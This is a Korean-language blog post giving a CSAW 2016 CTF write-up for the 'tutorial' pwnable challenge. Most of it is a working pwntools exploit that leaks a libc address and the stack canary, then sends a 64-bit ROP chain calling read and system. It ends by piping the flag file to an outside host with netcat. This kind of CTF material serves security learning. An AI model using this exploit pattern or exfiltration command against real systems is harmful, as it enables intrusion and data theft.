cdor1's lab
CSAW 2016 tutorial 본문
canary leak하구 제공해주는 libc로 가젯 오프셋 구해서 가젯 주소 구해준 후에 64bit rop!
func@plt - rdi, rsi, rdx, rcx
이 순서만 기억해주고 pop rdi, pop rsi ...으로 인자를 넣어준 뒤에 function call 하면 된다.
from pwn import *
s = remote('localhost', 4000)
elf = ELF('./tutorial')
offset_rdi = eval(raw_input())
offset_rsi = eval(raw_input())
offset_rdx = eval(raw_input())
base_offset = 0x6f860
print s.recvuntil('>')
s.sendline('1')
print s.recvuntil('Reference:0x')
leak = int(s.recvline()[:-1], 16)
base = leak - base_offset
system = base + 0x46640
prdi = base + offset_rdi
prsi = base + offset_rsi
prdx = base + offset_rdx
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
log.info('system : ' + hex(system))
print s.recvuntil('>')
s.sendline('2')
print s.recvuntil('>')
s.sendline('a'*311)
print s.recvuntil('a'*311 + '\n')
canary = u64(s.recv(8))
log.info('canary : ' + hex(canary))
print s.recvuntil('>')
s.sendline('2')
print s.recvuntil('>')
payload = 'A'*312
payload += p64(canary)
payload += 'A'*8
payload += p64(prdi)
payload += p64(4)
payload += p64(prsi)
payload += p64(elf.bss())
payload += p64(prdx)
payload += p64(100)
payload += p64(elf.plt['read'])
payload += p64(prdi)
payload += p64(elf.bss())
payload += p64(system)
s.sendline(payload)
s.sendline('cat flag | nc cdor1.cf 8080')
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| 공유기 vector (0) | 2017.03.17 |
|---|---|
| Format String Bug TIP (0) | 2017.03.17 |
| SECCON 2016 tinypad (0) | 2017.03.08 |
| pwnable.tw deathnote (0) | 2017.03.07 |
| pwnable.tw orc (0) | 2017.03.07 |
'Security/Pwnable' Related Articles
more
Comments